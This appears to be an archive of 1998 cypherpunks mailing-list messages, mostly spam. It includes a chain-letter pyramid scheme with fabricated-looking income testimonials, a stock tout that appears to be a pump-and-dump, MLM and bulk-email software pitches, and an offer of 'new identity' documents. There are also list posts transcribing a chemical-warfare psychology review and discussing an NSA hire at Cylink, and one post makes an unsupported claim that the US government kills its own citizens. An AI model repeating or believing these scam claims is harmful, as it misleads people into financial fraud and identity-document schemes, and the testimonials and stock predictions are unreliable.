REPORT #2, YOU CAN RELAX, because the system is already working for
you, and
the cash will
continue to roll in!

THIS IS IMPORTANT TO REMEMBER:

Every time your name is moved down on the list, you are placed in front
of
a DIFFERENT report.  You can KEEP TRACK of your PROGRESS by watching
which
report people are ordering from you.  If you want to generate more income,
send another batch of e-mails and start the whole process again!  There
is
no limit to the income you will generate from this business!

NOTE:  If you need help with starting a business, registering a business
name, how income tax is handled, etc., contact your local office of
the
Small Business Administration (a Federal agency) for free help and answers
to questions. Also, the Internal Revenue Service offers free help via
telephone and free seminars about business taxes.

*******T  E  S  T  I  M  O  N  I  A  L  S*******

     This program does work, but you must follow it EXACTLY!  Especially
the rule of not trying to place your name in a different position, it
won't
work and you'll lose a lot of potential income.  I'm living proof that
it
works.  It really is a great opportunity to make relatively easy money,
with
little cost to you.  If you do choose to participate, follow the program
exactly, and you'll be on your way to financial security.
          Sean McLaughlin, Jackson, MS

     My name is Frank. My wife, Doris, and I live in Bel-Air, MD. I
am a cost accountant with a major U.S. Corporation and I make pretty good
money. When I received the program I grumbled to Doris about receiving "junk
mail ". I made fun of the whole thing, spouting my knowledge of the population
and percentages involved.  I "knew" it wouldn't work. Doris totally ignored
my supposed intelligence and jumped in with both feet. I made merciless
fun of her, and was ready to lay the old "I told you so" on her when the thing
didn't work... well, the laugh was on me!  Within two weeks she had
received over 50 responses. Within 45 days she had received over $147,200
in $5 bills! I was shocked!  I was sure that I had it all figured and that
it wouldn't work.  I AM a believer now. I have joined Doris in her "hobby."
  I did have seven more years until retirement, but I think of the "rat
race" and it's not for me. We owe it all to MLM.

           Frank T., Bel-Air, MD

    I just want to pass along my best wishes and encouragement to you.
 Any doubts you have will vanish when your first orders come in. I even checked
with the U.S. Post Office to verify that the plan was legal. It definitely
is! IT WORKS!!!
           Paul Johnson, Raleigh, NC

    The main reason for this letter is to convince you that this system
is honest, lawful, extremely profitable, and is a way to get a large amount
of money in a short time. I was approached several times before I checked
this out. I joined just to see what one could expect in return for the minimal
effort and money required.  To my astonishment, I received $36,470.00
in the first 14 weeks, with money still coming in.
           
         Sincerely yours, Phillip A. Brown, Esq.

    Not being the gambling type, it took me several weeks to make up
my mind to participate in this plan. But conservative that I am, I decided
that the initial investment was so little that there was just no way that
I wouldn't get enough orders to at least get my money back. Boy, was I
surprised when I found my medium-size post office box crammed with orders!
For awhile, it got so overloaded that I had to start picking up my mail
at the window. I'll make more money this year than any 10 years of my life
before. The nice thing about this deal is that it doesn't matter where
in the U.S. the people live. There simply isn't a better investment with
a faster return.

         Mary Rockland, Lansing, MI

    I had received this program before. I deleted it, but later I wondered
if I shouldn't have given it a try. Of course, I had no idea who to
contact to get another copy, so I had to wait until I was e-mailed another
program...11 months passed then it came...I didn't delete this one!...I
made more than $41,000 on the first try!!

          D. Wilburn, Muncie, IN

 This is my third time to participate in this plan. We have quit
our jobs, and will soon buy a home on the beach and live off the interest
on our money. The only way on earth that this plan will work for you is if
you do it. For your sake, and for your family's sake don't pass up this golden
opportunity.  Good luck and happy spending!

           Charles Fairchild, Spokane, WA

     My name is John and I live in Bradenton, FL. a friend of mine has
mad $15,000 and is driving around a new jeep chrrokee and it makes me jealous!!!
So I am going to try it and collect my $5 bills!!!!!!!!

         John Miller, Bradenton Florida

ORDER YOUR REPORTS TODAY AND GET
STARTED ON THE ROAD TO FINANCIAL FREEDOM!!!







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bill payne <billp@nmol.com>
Date: Sat, 28 Feb 1998 21:11:32 -0800 (PST)
To: tcmay@got.net
Subject: chemical, biological, or radiation (CBR) weapons
Message-ID: <34F8ED42.3986@nmol.com>
MIME-Version: 1.0
Content-Type: text/plain

Saturday 2/28/98 9:44 PM

I transcribe some of what I got in the mail today.

Volume 9, Number 4, 1997

  MILITARY PSYCHOLOGY

  The Official Journal of the 
  Division of Military Psychology
  American Psychological Association

  Special Issue:  Effects of Chemical Protective
                  Clothing of Military Performance
  Guest Editors:  Gerald P. Krueger and
                  Louis E. Banderet

         Psychological Aspects of Chemical Defense and Warfare

	James W. Stokes
	U.S. Army Medical Department Center and School
	Fort Sam Houston, Texas

	Louis E. Banderet
	U.S. Army Research Institute of Environmental Medicine
	Natick, Massachusetts

  Concerns about chemical, biological, or radiation (CBR) weapons  and 
  their potential for warfare can be very stressful.  Such concerns
subject
  people to unfamiliar threats in highly ambiguous situations, in which 
  people feel they may be wronged or they are helpless.  Maladaptive
  psychological overreactions or underreactions may result.  Such
reactions
  to chemical warfare are illustrated with the experience from World War
I,
  the 1991 Persian Gulf War, and the 1995 terrorist attack in the Tokyo
  subway.  General principles of psychology suggest strategies and
tactics for
  training and materiel development that should enhance military
performance
  and reduce maladaptive stress in CBR threat situations.  Some of these
practices
  may be relevant to nonmilitary law enforcement and relief agencies
that manage
  CBR threats.

page 395.

Now I transcribe some of the more relevant stuff.

  Effects of Chemical Protective Clothing on Military Performance:

  A Review of the Issues

  Gerald P. Krueger
  Star Mountain, Inc.
  Alexandria, Virginia

  Lous E. Banderet
  U.S. Army Research Institute of Environmental Medicine
  Natick, Massachusetts
	
  This review in this special issue of Military Psychology on the
effects of chemical
  protective clothing (CPC) on military performance provide a historical
perspective
  on continued anxieties over likely use of battlefield
chemical-biological weapons and
  summarizes significant concerns of military personnel weaning CPC in
training and
  combat.  This review describes pschophysiological stresses such
protective ensembles
  have on personnel and how these affect military performance, and it
summarizes major
  military psychological research program on the effect of wearing CPC. 
This article
  reviews what is known about wearing CPC, describes future CPC
developments, and 
  identifies domains for improved military training with CPC.

              MEDICAL AND PSYCHOLOGICAL EFFECT 
              OF C-B WEAPONS

  There are many medical, physiological and psychological reactions from
exposure to
  chemical-biological (C-B) weapons.  Many bio-warfare agents and most
chemical weapons
  are designed to interfere with function of the nervous system and to
disrupt normal control
  of vital organ systems that sustain life.  For example,  the more
common chemical war
  nerve agents involve organophosphate compounds,  similar to
insecticides, that inhibit 
  cholinesterase enzymes throughout the body.  Because cholinesterase
hydrolyzes 
  acetylcholine where ever liberated, this inhibition  results in
excessive concentrations of 
  acetylcholine at various sites - from the ending of the
parasympathetic nerves to smooth
  muscles of the iris, ciliary body, bronchi, gastrointestinal trace,
bladder, and blood  vessels;
  to secretary gland of the respiratory tract' and to endings of the
sympathetic nerves to sweat
  glands (Newhouse, 1987; Simmons et at 1989).  Exposure to large
amounts of nerve agent
  may lead to loss of muscle control, twitching, paralysis,
unconsciousness, convulsions,
  coma, and even death.  The most common cause of death after acute
exposure is respiratory
  arrest.  Death may occur within minutes or take several hours.
     In terms of psychological functioning, moderate but nonlethal
exposure to nerve agent 
  produces severe impairment in cognition, vigilance, memory and
language.  Acute
  intoxication produces confusion, drowsiness, and difficulty in
concentration (Newhouse,
  1987).  These impairment make it difficult to continue to perform may
soldier tasks.
  Effects on cognition may persist after only a slight exposure. 
Performance improvement
  appears to correlate with the body's regeneration of
acetycholinesterase, usually requiring
  several months.
    Neurophysychological testing (Newhouse, 1987) reveals that chronic
exposure to 
  organophosphates significantly impairs higher mental function
requiring use of the frontal
  lobes, particularly the left lobe.  Organophosphate poisoning
selectively  impairs memory of 
  recently learned information, and this impairment is likely related to
cholinergic involvement
  in the memory processes.  The effects include defects in long-term
memory, visual searching,
  and response alteration - effects similar to those caused by a frontal
lobotomy.  In chronically
  exposed individuals, speed of task performance and overall cognitive
efficiency also declines.
  Persistent visual impairments are reported in workers poisoned with
anticholinesterase 
  insecticides, and acute poisoning impair oculomotor function. 
Poisoning with nerve agents may
  also cause psychiatric disturbances such as depression.
    Use of C-B weapons results not only in large number of physical
casualties on the battlefield
  by in may psychological casualties as well.  Concern over the mere
threat that C-B weapons 
  might be used raises battlefield anxiety of combatants and can produce
a level of fear 
  disproportionate to that evoked by countless alternative conventional
battlefield means of
  killing or maiming, such a with guns, artillery, and bombs.  Such
anxieties can create large
  numbers of psychological stress casualties contribution to unit
ineffectiveness on the battlefield
  and combat losses.  Such adverse emotions may also cause posttraumatic
stress disorders after
  combat ceases.
		
		DEVELOPMENT OF COUNTERMEASURES
		FOR THE COMBAT THEATER

   Modern military forces recognize the C-B weapons can be the
attention-getting equivalent
  of a poor country's nuclear weapons.  Such weapons can be
counter-acted, however, and
  concerned nations prepare their forces to preserve their health and
safety against C-B
  warfare.   ...

I will send a complete copy to John Young.

So I skip to the next section.

			THE THREAT OF C-B WARFARE

  Although biological warfare was used centuries ago by the Romans and
was used in the
  14th century by the Tartars, who catapulted plague-infected bodies
into cities under
  siege (Hewish, 1997),  military forces have made scant use of
biological warfare in modern
  times.  The more recent innovation of chemical warfare dates to 1914
when the French used
  tear gas against unprotected German forces, who in turn introduced
chlorine and phosgene
  in 1915 and mustard gas in 1917 against the British, who sustained
14,000 casualties in
  3 months (Hewish, 1997).  May World Ware I soldiers were grotesquely
injured or died in gas
  war trenches in France and Russia;  Russia's gas casualties exceed a
half million, including
  50,000 fatalities (Westerhoff, 1980).
    In 1925, many countries signed a Geneva Protocol prohibiting first
use of chemical and
  bacteriological weapons.  However, during the 1930s, several
countries, notably Germany,
  encouraged chemists to develop chemical weapons as a by-product of
insecticide research
  production.  By World War II, Germany and powers stockpiled huge
caches of chemical, but
  probably due to fear of in-kind retaliation, chemical weapons were not
used in World War II.
  After the war, Germany's organophoshporous arsenal fell into Russian
hands, and for the next
  50 years, military forces relegated C-B warfare efforts to relatively
quiet development programs
  for future battlefields.
    Since World War II, C-B weapons have been employed several times on
a relatively small
  scale.  In the 1970s, the Vietnamese used chemical and "yellow rain"
biological agents in 
  Cambodian jungles, the Soviets used chemical in Afghanistan (U.S.
Department of State,
  1980), Iraq used sulfur mustard  and other chemical in the Iran-Iraq
conflict (1979-1980),
  and Iraq used chemical in 1980 - this time against its own people, the
northern Kurds 
  (Studeville, 1997).
    There have been periodic threats to use chemical weapons on a grand
scale.  In the 
  1970s, the Warsaw Pact possessed huge stockpiles of chemical weapons (
mostly soman,
  cyanide, and mustard gas), and Soviet chemical warfare teams openly
conducted extensive
  training in gas warfare tactics.  Such readiness for large scale C-B
warfare was underscored 
  in the Persian Gulf War of 1991, as Iraq threatened to use chemical
(sarin) and biologicals
  (anthrax spores) against coalition forces and possibly against
neighboring cities in Saudi 
  Arabia and Israel (Begley, Barry,  & Hager, 1991).  By January 1991,
Saudi Arabia had
  predug 50,000 graves planned for burying civilian (noncombat)
casualties expected to 
  succumb to Iraqi chemical poisoning from anticipated rocket attacks on
Saudi cities or
  aerosols drifting from the battlefields (Kaplan, 1991).
    Although Iraq did not unleash such chemical, and the battles were
ultimately short, 
  many U.S. military personnel may been exposed to chemical during the
March 1991
  destruction of Iraqi weapon stockpiled (mostly sarin) near Khamisiyah,
Iraq (Stuteville,
  1997).  The U. S. government continue to investigate whether exposures
to chemical 
  agents may have contributed to the so-called Gulf War illnesses
experienced by many 
  U.S. military veterans of that encounter.  Exposure of soldiers to
multiple chemical and
   and environmental stressors may be linked to psychophysiological
illnesses that manifest
  in symptomatology such as disabling fatigue, insomnia, malaise, joint
and muscle pains, 
  skin sores, hair loss, and gastrointestinal and respiratory
difficulties (Brown &
  Priest, 1996).  Others asset that U.S. military personnel were exposed
to Iraq chemical 
  warfare from Scud missiles, artillery and aircraft (Stuteville, 1997)

			PUBLIC CONCERN

  Open, frank, public news of existent military chemical stockpiles,
proliferation of chemical
  or biological weaponry, and periodic 'saber-ratting' threats to use
such weapons amplify world
  public concerns over the enormity of what someday could be a horrific
chemical or biological
  calamity.  Unprotected civilian populations fear they may be
deliberately attacked by 
  chemical and biological weapons or inadvertently by aerosol warfare
agents drifting into
  populated areas of a battlefield.  Disastrous incident like the one in
1984 at a chemical 
  factory in Bhopal, India, which killed over 2,000 people and sickened
countless others, 
  sensitized citizenry to the lethal potential of such chemical
compounds.  In 1995, terrorist
  attacks on the Tokyo subway, and news media discussion of possible use
of nerve agents in
  terrorist disruption of public gathering like the 1992 and 1996
Olympics, heightened Public
  fears over such chemical incidents have become almost visceral.  News
of recent advances
  in genetic technologies (Dando, 1997)  suggest use of future
biological weapons with
  unprecedented insidiousness and specificity is possible.  Moreover,
the mass media and media
  expert sources remind the public that the United States  may not be
adequately prepared or
  trained to defend itself against chemical or biological warfare (Beal,
1997).  ...

Send more money, of course.

Banderet's Ph. D. thesis article is

              Visual Marking Following Transient Adaptation

	Journal of the Optical Society of America, Vol 51, 7 955-958
	July 1971

Banderet has worked for US Army Institute of Environmental Medicine
since 1971.

Banderet is another of my former Ph. D. students. In human factors, not
computer science.

US soldiers, of course, need some tranquilizers to calm them down is the
face of such
threats.  To improve battlefield performance.

Keep in mind guys that the US goverment is not above killing a bunch of
its
own citizens for its own BUSINESS goals.

Keep up-wind
bill

Title: Untitled Document









Viewing this page requires a browser capable of displaying frames.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Stephen Cobb, CISSP" <stephen@iu.net>
Date: Sat, 28 Feb 1998 21:09:33 -0800 (PST)
To: Ernest Hua <Hua@teralogic-inc.com>
Subject: Re: Cylink + NSA
In-Reply-To: <413AC08141DBD011A58000A0C924A6D50D7DAC@MVS2>
Message-ID: <3.0.5.32.19980228235649.007b3550@iu.net>
MIME-Version: 1.0
Content-Type: text/plain


At 02:24 PM 2/27/98 -0800, you wrote:
>Did anyone notice that Cylink just got a new VP of product development?
>Did anyone notice that this person just retired from the NSA?
>Care to guess the name and former rank?

Ern

For more about NSA + Cylink, see The Puzzle Palace : A Report on America's Most Secret Agency, James Bamford, Viking Press, 1983, ISBN: 0140067485. Also, The Stephen Cobb Complete Guide to PC&LAN Security, TAB-Windcrest-McGraw-Hill, 1991, ISBN: 0830632808, page 268.

Also, this was announced in a press release in January:
<snip> 
Former Deputy Director of the National Security Agency Brings Security Leadership to Strengthen Customer Relationships for Cylink and Drive Product Management

Cylink Corp. (NASDAQ:CYLK), a leading worldwide supplier of network security solutions, today names William P. Crowell Vice President, Product Management and Strategy. Crowell, recently retired from the United States National Security Agency (NSA) as Deputy Director, will partner with the senior management of Cylink customers worldwide to assist them in developing and implementing strategic business plans and solutions to meet their network security needs. He also will be responsible for Product Management of all Cylink offerings. Crowell brings 17 years of executive management experience in both private industry and government to Cylink. In his previous position at the NSA, he served as Deputy Director for 3.5 years and was chief operations officer of the Agency, guiding and directing the development of strategies and polices, and serving as the principal advisor to the Director. He has extensive technical and practical knowledge of the technologies needed to achieve integrated network security, including encryption technology, digital signatures, public key management, and infrastructure issues. He also has experience managing research and development projects, and programs associated with information systems deployment. 
<snip>
Stephen
<<<<<<<<<<<<<<<Stephen Cobb, CISSP>>>>>>>>>>>>>>>>>
Certified Information Systems Security Professional
tel: 1.407.383.0977 fx: 0336 email: scobb@miora.com
For information security info, http://www.miora.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: user3847@blue.com
Date: Fri, 25 Dec 1998 03:08:39 -0800 (PST)
To: <hughes@toad.com>
Subject: MASS E-MAIL WORKS...AND WE GUARANTEE IT!
Message-ID: <199812251108.DAA27357@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


INTERNET MARKETING COULD BE THE ANSWER!
DO you have a product or service that would benefit from being in 
front
of millions of potential buyers??? Have ever dreamed of having 
your 
service or product take off "overnight"? Did you know that with 
the 
nation's recent introduction to WEB-TV, soon 95% of all households 
will be able to receive electronic mail! 
........The wave of the future is here...get out your surfboard!
CALL US AT (702)257-8547 Ad # Ross99 FOR MORE INFO!


WHY IS MASS E-MAIL SO EFFECTIVE???
You are placing your message directly in front of people! There is 
no need for anyone to "search" to find a website, or the right 
radio 
station, or TV station, or the right page in the newspaper. Your 
message
is waiting for them when they turn on their computer making it 
easy 
for THEM to find YOU! The only question is; CAN YOU HANDLE THE 
VOLUME OF BUSINESS??
CALL US AT (702)257-8547 Ad # Ross99 FOR MORE INFO!


HOW MUCH DOES IT ALL COST??? 
We can send your ad to millions of email addresses in the US or 
around the world!
100K ads mailed....................................$150.00
1million   "         ..............................$300.00
2million   "         ..............................$500.00
3million   "         ..............................$650.00
Additional Million................ONLY $100.00 per million
ALL ORDERS PLACED DURING THE HOLIDAY SEASON WILL RECEIVE 
SEMI-TARGETING FREE!
CALL US AT (702)257-8547 Ad # Ross99 FOR MORE INFO!


*GUARANTEED SERVICE! 
We are so sure that you will be pleased with your first mass 
mailing program that 
if you are not 100% satisfied FOR ANY REASON we will resend your 
ad for only $100.00!
CALL US AT (702)257-8547 Ad # Ross99 FOR MORE INFO!


THE BEST NEWS! WE ANSWER ALL OF OUR CALLS LIVE!
Call us at (702)257-8547 Ad # Ross99 we normally answer our calls 
"live" however
if we are unavailable our trusty voice mail will take your 
message, 
page us, and we will return your call forthwith (normally within 
24 hours) 
Our LIVE, friendly staff will quickly answer your questions and 
design and 
tailor an advertising program to your product and budget. 


OTHER SERVICES WE OFFER......

TARGETED E-MAILING....OUR SPECIALTY!
If you can imagine it, we can develop a targeted list for it!

BULK FRIENDLY WEB HOSTING
We can refer you to a "bulk" friendly web site that will host your 
site! 

POSTING TO NEWSGROUPS
We can post to over 30 thousand newsgroups or just specific 
targeted newsgroups.

FREE CLASSIFIED ADS
We have software that can place your ad in thousands of FREE 
classified ad sections! 

MOVE YOUR WEBSITE UP IN THE SEARCH ENGINES
We have the latest generation of software that moves your website 
info higher in ALL 
of the popular search engines so that it is more visible!

ADVERTISING CONSULTING
We teach you some "tricks of the trade" that can save you time, 
possible 
grief, and possibly lots of $$$$ down the road!


MENTOR PROGRAM (YOU SEND YOUR OWN E-MAIL)
All of us at one time or another have seen a professional do 
his/her job 
and said "I can do that" but just didn't know where to get the 
supplies, 
who to talk to, or ...just how to get started. Wouldn't it be 
great if 
someone would just spend a little time "holding our hand" while we 
got 
the hang of it? Maybe let us in on some of the little secrets that 
took 
them years to figure out.....most of us would pay a pretty penny 
for a 
professional to spend time with us, one on one, and share the 
secrets 
that has taken him/her years to master.

OUR MENTOR PROGRAM is the answer! We set you up with a proven 
commercial 
bulk e-mailing software program capable of sending over 100K 
messages an 
hour (after it is registered) using your existing computer, and it 
is so 
easy to use a child could use it, a targeting software to identify
just about any criteria you can think of, plus a CD of e-mail 
names, 
and most important...insider "tricks to the trade" from some of 
the 
best mass mailers in the world so that you can send your own bulk 
e-mail. 

The main advantage is, that after your initial expense, you can 
send mass 
e-mail when you want at NO COST and can really fine tune your ad 
for 
the best possible response. Also included is ongoing "real world" 
help and complete "hand holding" while you get up to speed at 
sending 
your own mass e-mail. And if you like, we will set you up in an 
Internet business that is a "no brainer" and if you work at it a 
little 
bit, you can make you thousands of $$$ every month. Those that 
work a 
little harder will make lots more $$$$$$$$$ every month.

Our fee for this program is $595.00 plus expenses.


................By calling us now @702-257-8547 Ad # Ross99  (You 
must provide this 
ad# for us to return your phone call) you could be on your way to 
having your ad 
in front of millions of NEW customers in as little as 24 hours. 
So....what are you waiting for???





BULK E-MAIL WORKS!! 
Save our planet and support mass E-Mail!!!
If this E-mail offends anyone, we apologize ......and feel free to 
use the "del" key.

NOTE: 
For those on the Internet who do not want to receive exciting 
messages 
such as this.....to be removed from our mailing list and our 
affiliate lists call us 
direct @ 1-800-404-1475 extension 2031 for immediate removal. 

*We strive to comply with all state and federal laws and to send 
ads 
only to interested parties.

*This ad is not intended for nor do we knowingly send to 
Washington State residents. 

*Responding to the "return address" will NOT have your name 
removed. 






PRINT THIS AD FOR FUTURE CONSIDERATION!!
 
 
 
 
 
 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: bpi@ns9.internetconnect.net
Date: Sun, 1 Feb 1998 03:26:14 -0800 (PST)
To: Friend@public.com
Subject: Being a Better Educator and Parent
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain



Dear educator:

Today, more than ever, we need innovative new solutions to 
educational problems. 

        "Kevin Kirchman's book Aspirations is an answer 
        to education questions such as 'How do we teach 
        students to think for themselves, fulfill their 
        potential, be creative, gain self esteem, and be 
        ready for this productive world?'

        "His book is a must for all educators from pre-school
        through graduate school. I wish his book had been
        available during my 42 year teaching career."
                 Norma Silver
                 Retired teacher, Fort Lee, NJ

Introducing,
         Aspirations: The Rational Foundations of Achievement. 

The reason it is possible to have an entirely new perspective on
educational issues is because the theory behind education, called
epistemology, or the theory of knowledge, has _not_ been an empirical
science.

Epistemology is to education what physics is to engineering--
but until the basis was discovered for _principles_ of understanding,
there could be no science, and no applications that would radically
transform educational practices. 

That is until now.

        "If knowledge of the humanities is subjective, that is,  only
        valid  for the person who holds it, of what value is
        education?

        "Knowledge is not subjective. There are some conceptual 
        models that are better--more accurate and enlightening--
        than others."
                Aspirations

Aspirations will show you why, and teach you precisely how to tell the
difference. 

        "[Aspirations] lays out the foundations of clear,  critical
        thinking, that can help us to better understand ourselves,
        others, and the world around us. In the final analysis, we are
        all decision makers. Don't make many more important decisions
        before you read and grasp Aspirations."
                Frank L. David
                        Co-Principal, Business Learning Centers
                        Murrieta, CA

Perhaps the last earthly frontier, the mind, has been finally
penetrated by this wonderful new book. Aspirations won't give
you old ideas about the mind that you've seen before. It's 
radically new.

Aspirations shows how, because of an old philosophical problem, 
educators are unwittingly discouraging idea forming habits that 
occur through the mental process of induction, or generalization. The
book shows how these inductive concepts are the basis of all abilities
and character. 

Deterring concept formation has the effects of hindering 
individuality, stifling general competency and causing people to be
more dependent upon the ideas formed by others (being less able to
form them themselves). The book presents a new solution to this
dilemma which describes the mental events that occur during concept
formation that can be practiced and made habit.

Aspirations makes it clear that if you are less able to form 
concepts of your own, you necessarily have to borrow those formed by
others. This discourages individuality, creativity, and self-reliance.
It is also the basis for a host of psychological problems, from
prejudice and intolerance to low self-esteem. 

Set within the context of human intellectual history, Aspirations stands out as a unique and controversial contribution to our understanding of ourselves. 

        Fascinating reading. A journey deep into the corners of the
        mind and down the paths of civilization's  philosophical
        development. 

The author of Aspirations, Kevin Kirchman, a Cornell University
educated Artificial Intelligence scientist, lecturer and businessman,
has actually utilized his new understanding of innovation to develop
original perspectives on

        * deduction, or what reasoning is
        * induction, the basis of all innovation and creativity
        * character formation

and these new ideas genuinely will aid you not only in teaching
better mental habits, but in improving your own. 

        "[Aspirations] is a self-motivational book for  intelligent
        people."
                Stan Irwin
                        The Producer of the Tonight Show
                        with Johnny Carson for 15 years

Rarely in human history is a book produced which has as important
implications. Rarely is a book offered which gives us such hope and
inspiration.

Aspirations will soon be promoted nationally by Rogers & Cowan,
America's largest public relations firm. Be the first to learn and
apply these revolutionary new insights. 

                 Table of Contents:
        1    Introduction
        2    The Problem -- Why Educational Philosophy is
                 Psychologically Debilitating
        3    Concepts -- The Key to Understanding the Mind
        4    Descriptive Concepts -- The Foundation of Clear
                 Thinking
        5    Creating Ideas -- Concept Formation is Induction
        6    Character -- The Conceptual Origins of Personal
                 Qualities
        7   Motivation -- A Theoretical Defense of the
                 Principles of Achievement
        8   Reasoning -- A New and Practical Overview
        9   Goal Setting and Decision Making -- Giving
                 Yourself a Purpose
       10   Deduction -- The Connection Between Logic and
                 Common Sense
       11   Reasoning Well -- Applying the New Science of Logic
       12   The Principles of Induction -- New Solutions
                 to a Classical Challenge
       13   Conceptual Modeling -- Coming Up with the Best
                 Concepts
       14   Teaching Induction -- Overcoming the Fear of
                 Abstractions
       15   Philosophical Clarifications -- Understanding
                 the Breakthrough and Replacing Outdated
                 Technology
       16   The New Science of Logic -- Clearing the Way for a
                 Revolution in Rationality
       17   Historical Background and Philosophical Comparison --
                 Putting the Conceptual Model Theory Into
                 Perspective

If, after receiving "Aspirations", you are not completely
satisfied, return it for a prompt and full refund.

Only $16.95 plus $3.50 postage and handling
For orders of 2 or more, p&h is free. 

ORDER Aspirations NOW by calling USA 

                 International	1 310 289-2394,
                 or faxing to 	1 310 854-1840
any time with your credit card details.

Or, Mail Check, Money Order, or Credit Card details to:
        Breakthrough Publishing, Inc.
        291 S. La Cienega Blvd., Suite 107
        Beverly Hills, CA 90211

YES! __ I would like ____ copies of Aspirations * $16.95 = __________
           + $3.50
        = __________

Name ________________________________________
Title __________________
Organization_________________________________
Mailing Addr ________________________________
_____________________________________________
City ___________________ State ______________
Post Code ____________
Country ___________________________

VISA ___   MasterCard ___   American Express ___ Discovery ___

Card #	__ __ __ __   __ __ __ __   
   __ __ __ __   __ __ __ __ 

Expiration Date __________

Signature _________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jaqui5535@juno.com
Date: Sun, 1 Feb 1998 07:18:07 -0800 (PST)
To: smartinvestors3@newsletter.com
Subject: Re: E-ALERT: URGENT BUY RECOMMENDATION
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Cronus Corporation
Symbol: C R O N
Recent Price: 1/2 ($.50/share)

Wall Street analysis from Harvard Equity Research has issued a
STRONG BUY recommendation on CRON stock.  Charles Blitzer
was quoted as predicting a $1.25 to $1.50 price near-term
with a "thrust into the $3-$4 range sometime in 1998".

Harvard Equity Research's last recommendation in October, AATK,
went from $3 1/2 to $9 in ten trading days!

Harvard Equity Research is so confident of their projections that
they are offering their subscribers a money-back guarantee on their
subscription if CRON doesn't at least double within the next year.

To reiterate: an IMMEDIATE & STRONG BUY recommendation
on CRON.

For further information go to: http://quote.yahoo.com/
or send a SASE, for a free issue of Harvard Equity Research's
latest top-rated newsletter, to H.E.R., P.O. Box 96159,
Boston, MA 01742

-------------------





























From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 10666148@08855.com
Date: Sun, 1 Feb 1998 12:18:43 -0800 (PST)
To: Friend@public.com
Subject: WANT TO KNOW A SECRET??
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


STOP EVERYTHING!

WE  PAY  FOR  YOU  TO  JOIN !

THE BUSINESS OPPORTUNITY:
    No other organization has our technology!
    Our products are needed in almost every home and business. They
  are currently in less than 2% of U.S. homes and very few  businesses.
    Significant commissions (over 40%) can be made from retailing
  alone.

THE MLM OPPORTUNITY:
    Your sponsor pays your $163 startup costs. You receive 3 high-tech
  products worth $1200 with zero money down.
    You sponsor one person, we approve a $1,200 check for you, you
  pay their $163 startup costs, and start receiving large commissions, and
 up to 42% residuals from your downline.
     PLUS - Well show you how to get qualified prospects eager to
  learn your money-making secret!

Bill Gates said that the secret to his success was being in the right place
at the right time. For our company (and you), this is it!

         CALL THE FOLLOWING TOLL FREE NUMBER.
              IT MAY CHANGE YOUR LIFE!!!

     Three minute recorded message:  1-800-481-3181
            There are also live Conference Calls

As soon as youre convinced about the great company, the state of the art
products, the enormous market potential, and the huge MLM opportunity,

        1. Dial Fax on Demand (409-988-0413) (press 9 during greeting
  message, then *, then 1) for additional information, or
        2. Leave a voice message (409-988-0413), or, if lines are busy,
        3. Respond by e-mail to alphaenterprises@yahoo.com.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mktmaster23662@juno.com
Date: Mon, 9 Feb 1998 22:04:26 -0800 (PST)
To: Friend@public.com
Subject: HERE IS HOW TO BULK EMAIL...
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Press the reply button and type "remove" (without the quotes) in the 
subject heading to be removed from our list.  Thank You
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Here is how to bulk email your product, service,
or business opportunity SUCCESSFULLY...

FACT:
While there are many people who TRY to bulk email,
There are very few who do it successfully!

Why?:
Because many people buy bulk email software along with millions 
of addresses, and are still not supplied with the NECESSARY
INFORMATION they MUST HAVE to successfully bulk email.

Here is the rest of the information that the bulk email programs
and list sellers never give you that you MUST have.

For the beginner:

This site teaches you as if you were in the 1st Grade, with complete step-by-step INSTRUCTIONS, SOFTWARE & addresses
to start effective bulk emailing IMMEDIATELY, at speeds of
up to 250,000 emails per hour (and faster).

Don't pay someone else to send your bulk email...
You never know if it REALLY IS going out!
DO IT YOURSELF!


WE INCLUDE:

* COMPLETE INSTRUCTIONS on HOW to send Bulk Email!
* Information on SMTP servers
* "bulk friendly" ISPs
* How to Make sure your email is being delivered
* How to read header information
* How to put "CLICK HERE" links in your bulk email
* HOW TO SEND BULK EMAIL IN COLOR
* Information on the Internet and WHY bulk emailing
* Much, Much More!

Also:

* FREE 8 MILLION EMAIL ADDRESSES available for download
   RIGHT NOW!
* FREE Email List Management Software (sorts, counts, filters,
   combines, etc. at Lightning Speed!)
* STEALTH MASSMAILER SOFTWARE  When registering
   YOU WILL SAVE 50%!!!!!
* FREE Software demo that AUTOMATICALLY keeps you signed
   on AOL indefinitely!
* Search Engine submission software demo
* MANY MORE SUPRISES AND PROGRAMS!!!!


The cost for membership is only $99.00!!!! Limited Time Offer!

<HTML><PRE>CLICK HERE NOW!</PRE></HTML>

or point your browser to:  http://209.51.216.146/bulk.htm








































From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: majordomo@bulkemailserver.com
Date: Wed, 11 Feb 1998 01:08:55 -0800 (PST)
To: Friend@public.com
Subject: Please send information
Message-ID: <>
MIME-Version: 1.0
Content-Type: text/plain


Please send us more information on your product, service, business and/or
money making opportunity.  We are always looking for more ways to make money
and looking for resources to refer to our customers.  You may send us your information
at insane.income2@mailexcite.com  Do not hit reply because we will not receive it.

Do you need a NEW IDENTITY/ NEW ID/ PRIVACY/ PROTECTION/ CREDIT?

If yes, send an email to our Auto Responder at newid-info@freeyellow.com
Within minutes you should automatically receive more detailed information.
There is no need to type a message to us because we will not see.
The auto responder is an automated service that is programmed to send 
what we have already entered.

Do to the HIGH DEMAND FOR THIS INFORMATION your email may
not go through.  If after 10 minutes you haven't received anything than
fax us at (209) 952-8555 and request the "NEW IDENTITY" information.

HURRY,  get the information NOW!  We have a time limited
SPECIAL OFFER.  The information says that special expires
on Feb. 16, 1998, but because of the holiday we have extended the
special 2 more days, until Feb. 18, 1998!

